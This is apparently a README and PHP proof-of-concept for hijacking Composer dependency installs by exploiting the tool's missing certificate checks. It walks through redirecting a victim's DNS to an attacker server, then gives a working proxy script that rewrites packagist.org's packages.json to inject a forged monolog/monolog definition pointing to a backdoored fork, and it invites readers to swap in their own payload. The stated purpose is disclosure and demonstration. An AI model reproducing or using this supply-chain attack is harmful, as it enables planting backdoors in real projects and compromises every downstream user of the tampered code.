Backdoor projects that use composer (exploit https://github.com/composer/composer/issues/1074)

This exploits composer's lack of certificate checking to drop a backdoored verson of an included library into a projects codebase.

This is for demonstration only, etc, etc. Hopefully this will show people why they shouldn't automatically run composer when deploying code into production until composer fixes their certificate checking.

To exploit this issue, you have to get in the middle of a user's connection to packagist.org. For demo's, it's easiest to set a victim's dns to point to the attacker, but there are obviously plenty of other ways to get in the middle of a connection.

Once we're a MITM, we override a packagist's package definition with our own. It looks like composer uses that last defined definition for a package, so adding a extra provider at the end of packages.json seems to work well for now.

In this demo, the provider (re-)defines monolog/monolog. Not to pick on them as a project, but's it a popular one and in use by MediaWiki. The new definition points to my own version of monolog (https://github.com/Stype/monolog) for all versions of monolog currently defined (up to 1.15.0).

If you want change the payload (you probably do), update monolog.json to point to the repository and commit of your choice. Then run

to get the sha256 hash of that file. You'll need to update the hash in p-attack.json. The proxy.php script will automatically calculate the sha256 of p-attack.json when inserting the definition into package.json.

For testing, on the victim I set a local hosts directive to point to my webserver (192.168.1.143).

/etc/hosts:

On my webserver, I have apache running with both http and https sites defined. Composer randomly uses both http and https, so the server needs to respond to both.

ssl.conf:

and vhosts.conf:

{"providers":{"monolog\/monolog":{"sha256":"6f766875ca75df522c576a1b79cb4f6216cf82b808bb3d5e2b94a9a9b95cf50b"}}}

$url = $_GET['url'];

$method = $_SERVER['REQUEST_METHOD'];

$https = $_SERVER['HTTPS'];

$furl = ( $https == 'on' ) ? "https://" : "http://";

$furl .= "packagist.org$url";

debuglog( "Call ($method):$https to '$furl'" );

if ( $url == '/packages.json' ) {

$data = getPackagist( $furl, $https );

$attackfile = file_get_contents( './p-attack.json' );

$hash = hash( 'sha256', $attackfile );

$data = str_replace( '}}}', '},"p\/provider-attack$%hash%.json":{"sha256":"'.$hash.'"}}}', $data );

debuglog( "New packages.json: $data" );

} elseif ( preg_match( '#^/p/provider-attack#', $url ) ) {

$data = file_get_contents( './p-attack.json' );

debuglog( "Sending attack provider: $data" );

} elseif ( preg_match( '#^/p/monolog/monolog#', $url ) ) {

$data = file_get_contents( './monolog.json' );

debuglog( "Sending attack monolog: $data" );

} else {

$data = getPackagist( $furl, $https );

}

echo $data;

function getPackagist( $furl, $https ) {

$ch = curl_init();

curl_setopt( $ch, CURLOPT_URL, $furl );

curl_setopt( $ch, CURLOPT_HEADER, 0 );

curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );

if ( $https == 'on' ) {

curl_setopt( $ch, CURLOPT_PORT , 443 );

curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );

curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, 0 );

}

$data = curl_exec( $ch );

$info = curl_getinfo( $ch );

if ( curl_errno( $ch ) ) {

debuglog( "Curl error: ".curl_error($ch) );

}

$hash = hash( 'sha256', $data );

debuglog( "Response from {$info['url']} ({$info['http_code']}): {$info['content_type']}, $hash" );

return $data;

}

function debuglog( $msg ) {

file_put_contents( '/tmp/proxy.log', "$msg\n", FILE_APPEND );

}